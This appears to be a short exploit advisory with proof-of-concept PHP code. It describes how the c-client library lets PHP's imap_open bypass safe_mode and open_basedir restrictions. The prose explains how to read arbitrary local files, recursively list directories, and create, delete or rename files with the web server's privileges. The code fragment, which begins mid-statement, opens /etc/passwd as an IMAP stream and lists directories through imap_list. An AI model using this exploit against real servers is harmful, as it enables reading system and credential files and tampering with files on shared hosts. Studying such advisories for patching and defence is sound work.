Vulnerability in c-client library (tested with versions 2000,2001,2004), mail_open
could be used to open stream to local files.
For php and imap module
imap_open allow to bypass safemode and open_basedir restrictions.
Use imap_body or others to view a file and imap_list to recursively list a directory.
s/mailbox/file :)
imap_createmailbox
imap_deletemailbox
imap_renamemailbox
to create,delete,rename files with apache privileges.
##### code #####
".$str."";
imap_close($stream);
} elseif ($string && $switch == "dir") {
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("Can't open imap stream");
$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
echo "";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]\n";
echo "";
imap_close($stream);
}
?>
################